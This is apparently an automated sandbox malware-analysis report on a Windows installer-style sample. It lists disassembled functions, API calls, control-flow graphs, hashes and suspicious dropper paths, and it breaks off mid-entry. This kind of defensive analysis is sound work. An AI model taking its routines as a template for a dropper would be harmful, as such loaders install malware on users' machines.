                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                        • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                        • API String ID: 3751793516-3136820510
                                                        • Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                        • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                        • Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                        • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D
                                                        Function 00405C13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 707 405c13-405c45 RegOpenKeyExW 708 405c87-405c8a 707->708 709 405c47-405c66 RegQueryValueExW 707->709 710 405c74 709->710 711 405c68-405c6c 709->711 712 405c77-405c81 RegCloseKey 710->712 711->712 713 405c6e-405c72 711->713 712->708 713->710 713->712
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
                                                        • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: : Completed
                                                        • API String ID: 3677997916-2954849223
                                                        • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                        • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                        • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                        • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9
                                                        Function 004059FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 714 4059fe-405a0a 715 405a0b-405a3f GetTickCount GetTempFileNameW 714->715 716 405a41-405a43 715->716 717 405a4e-405a50 715->717 716->715 718 405a45 716->718 719 405a48-405a4b 717->719 718->719
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405A1C
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-44229769
                                                        • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                        • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                        • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                        • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64
                                                        Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 720 401e51-401e62 call 402ad0 call 404ffa call 4054c8 726 401e67-401e6c 720->726 727 401e72-401e75 726->727 728 402729-402730 726->728 730 401ec6-401ecf CloseHandle 727->730 731 401e77-401e87 WaitForSingleObject 727->731 729 40295d-40296c 728->729 730->728 730->729 733 401e97-401e99 731->733 734 401e89-401e95 call 4060e9 WaitForSingleObject 733->734 735 401e9b-401eab GetExitCodeProcess 733->735 734->733 737 401eba-401ebd 735->737 738 401ead-401eb8 call 405c8d 735->738 737->730 742 401ebf 737->742 738->730 742->730
                                                        APIs
                                                          • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                          • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                          • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,759223A0), ref: 00405055
                                                          • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                          • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                          • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 3585118688-0
                                                        • Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                        • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                        • Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                        • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99
                                                        Function 004054C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 744 4054c8-4054f5 CreateProcessW 745 405503-405504 744->745 746 4054f7-405500 CloseHandle 744->746 746->745
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                        • CloseHandle.KERNEL32(?), ref: 004054FA
                                                        Strings
                                                        • Error launching installer, xrefs: 004054DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                        • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                        • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                        • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                        Function 004031A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 0040603D
                                                          • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                          • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 00406051
                                                          • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 00406064
                                                        • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 004031CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 4115351271-2030658151
                                                        • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                        • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                        • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                        • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                        Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                        • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                        • Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                        • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                        Function 00401F08 Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
                                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39
                                                          • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: AllocFileGlobalInfoSizeVersionwsprintf
                                                        • String ID:
                                                        • API String ID: 1691843260-0
                                                        • Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                        • Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
                                                        • Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                        • Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68
                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                        • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                        • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                        • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                        Function 004050CD Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 004050DD
                                                          • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                        • CoUninitialize.COMBASE(00000404,00000000), ref: 00405129
                                                        Memory Dump Source
